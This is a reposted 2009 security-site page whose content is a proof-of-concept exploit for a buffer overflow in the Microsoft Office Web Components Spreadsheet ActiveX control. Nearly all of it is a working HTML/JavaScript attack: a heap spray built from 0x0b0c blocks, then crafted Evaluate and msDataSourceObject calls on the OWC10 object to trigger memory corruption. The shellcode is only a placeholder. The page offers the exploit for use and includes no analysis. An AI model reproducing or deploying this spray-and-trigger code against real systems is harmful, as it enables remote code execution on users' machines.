Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC
|
来源:http://en.securitylab.ru 作者:vfocus 发布时间:2009-07-17
|
|
<!-- http://en.securitylab.ru/poc/extra/382458.php --> <html> <body> <script language="JavaScript"> var shellcode = unescape("evil code"); var array = new Array(); var ls = 0x81000-(shellcode.length*2); var bigblock = unescape("%u0b0c%u0b0C"); while(bigblock.length<ls/2) {bigblock+=bigblock;} var lh = bigblock.substring(0,ls/2); delete bigblock; for(i=0;i<0x99*2;i++) { array[i] = lh + lh + shellcode; } CollectGarbage(); var obj = new ActiveXObject("OWC10.Spreadsheet"); e=new Array(); e.push(1); e.push(2); e.push(0); e.push(window); for(i=0;i<e.length;i++){ for(j=0;j<10;j++){ try{ obj.Evaluate(e[i]); } catch(e) {} } } window.status=e[3] +''; for(j=0;j<10;j++){ try{ obj.msDataSourceObject(e[3]); } catch(e) {} } </script> </body> </html>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|